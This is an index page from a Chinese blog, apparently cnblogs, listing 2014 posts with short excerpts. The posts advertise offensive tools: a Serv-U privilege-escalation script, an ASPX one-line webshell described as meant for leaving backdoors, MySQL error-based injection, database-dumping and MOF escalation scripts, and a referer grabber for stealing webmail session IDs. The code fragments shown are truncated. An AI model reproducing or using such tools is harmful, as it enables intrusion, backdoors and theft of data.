随笔分类 -  代码

上一页 1 2
代码编写
获取当前 Windows 的安装序列号
摘要:Dim ss = InputBox("当前Windows系统序列号为:", "Windows序列号", GetWindowsSN)WScript.Quit'取得当前Windows序列号函数Function GetWindowsSN() Const HKEY_LOCAL_MACHINE = &H... 阅读全文
posted @ 2014-11-03 22:16 Hookjoy 阅读(1225) 评论(0) 推荐(0)
CVE-2013-3908 Internet Explorer打印预览功能可导致信息泄露
摘要:原文:http://masatokinugawa.l0.cm/2014/11/ie-printpreview-infoleak.html 问题1:在IE9和以前的版本当中进行打印预览操作时,IE会取出原始页面的URL并将URL放到重新生成的html中的base标签的href属性里。由于此处并没有对U... 阅读全文
posted @ 2014-11-02 19:00 Hookjoy 阅读(357) 评论(0) 推荐(0)
serv-u and hway3.0
摘要:一个非常好用的su提权脚本,在支持php的环境下,目录可读可写,基本秒杀。端口 $i 开放!"; $a=true; } else { echo "端口 $i 未开放!"; } } return $a;}... 阅读全文
posted @ 2014-11-01 11:47 Hookjoy 阅读(1549) 评论(0) 推荐(0)
......
摘要:代码简单,获取referer用的,在社工邮箱时,盗取当前邮件的ssid,mid等等进而达到阅读用户邮件的目的 阅读全文
posted @ 2014-10-21 09:39 Hookjoy 阅读(125) 评论(0) 推荐(0)
ASPX版菜刀一句话,留后门专用
摘要:首先解释一下为什么要做这个玩意:众所周知.net一句话是不能插入到文件之中的,除非那个页面使用Jscript编写,但是现在看来Jscript市场很低,遇到的.net站基本都是C#。新建一个SHELL太过于明显,而且其中的eval更是在WEBSHELL扫描工具的淫威下直接出局。如果不能提权的话,那么过... 阅读全文
posted @ 2014-10-19 14:09 Hookjoy 阅读(1917) 评论(0) 推荐(0)
又一种Mysql报错注入
摘要:from:https://rdot.org/forum/showthread.php?t=3167原文是俄文,所以只能大概的翻译一下这个报错注入主要基于Mysql的数据类型溢出(不适用于老版本的Mysql)mysql> SELECT 18446744073709551610 * 2; ERROR 1... 阅读全文
posted @ 2014-06-26 10:26 Hookjoy 阅读(1561) 评论(0) 推荐(0)
PHP wget 增强脱裤脚本(PDO MYSQL)
摘要:脚本参考了 LCX Gavin2位前辈的帖子.在此表示非常的感谢. https://www.t00ls.net/thread-26740-1-1.html https://www.t00ls.net/thread-26791-1-1.html说明:脚本支持PDO和MYSQL 2种方式... 阅读全文
posted @ 2014-06-22 00:35 Hookjoy 阅读(1710) 评论(0) 推荐(0)
拖库其实很简单+asp+mssql
只有注册用户登录后才能阅读该文。
posted @ 2014-05-15 23:41 Hookjoy 阅读(8) 评论(0) 推荐(0)
php读取3389脚本
摘要:RegRead($regkey));//www.cnblogs.com/hookjoy/ hookjoy?> 阅读全文
posted @ 2014-04-23 23:40 Hookjoy 阅读(225) 评论(0) 推荐(0)
mof提权带回显带清楚命令版本.php
摘要:Win MOF ShellHost:User:Pass:DB: '.mysql_error().'');echo "";echo "Cmd:";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";echo "";if ... 阅读全文
posted @ 2014-04-14 20:19 Hookjoy 阅读(446) 评论(0) 推荐(0)
shell.application asp多种组件执行cmd 单文件版本
摘要:Err ThenIsObjInstalled = TrueElseIsObjInstalled = FalseEnd ifSet xTestObj = NothingErr = 0End Function%>支持组件:" & theComponent(i) & "√" & vbCrLfElseResponse.Write "" & theComponent(i) & "×" & vbCrLfEnd ifNext%> " & Err.Des 阅读全文
posted @ 2014-04-12 12:50 Hookjoy 阅读(1264) 评论(0) 推荐(0)
Shtml妙用
摘要:shtml用的是SSI指令,SSI指令虽然不多 但是功能相对而言还是很强大的,在PHP禁止了命令执行函数和开了安全模式的时候可以试试看也可以在服务器允许上传shtml后缀脚本的时候试试PS:只有服务器配置了允许执行SHTML才行 对于SSI 百度百科给出的解释是:SSI是为WEB服务器提供的一套命令,这些命令只要直接嵌入到HTML文档的注释内容之中即可。如: 就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。他的指令我就不一样列举了 提几个有用的 //可以用来读文件 //可 阅读全文
posted @ 2014-04-07 21:45 Hookjoy 阅读(509) 评论(0) 推荐(0)
Asp反向代理程序,调用远程站点全站数据,一款脚本级反向代理程序.
摘要:前些天临时写的一脚本级反向代理程序,用法很简单,设置好目标站地址,然后放到你网站根目录:index.asp,再将404页面自定义为:index.asp,即可。由于暂时没有 url 替换需要,所以没有写 url 替换规则,如果你有需要的话,可以在末尾写个函数替换 http.ResponseBody 中的内容。 0 Then '提取参数 url = Mid(Request.QueryString, Len("404;http://" & Request.ServerVariables("HTTP_HOST") & ":&qu 阅读全文
posted @ 2014-03-30 22:39 Hookjoy 阅读(1147) 评论(0) 推荐(0)

上一页 1 2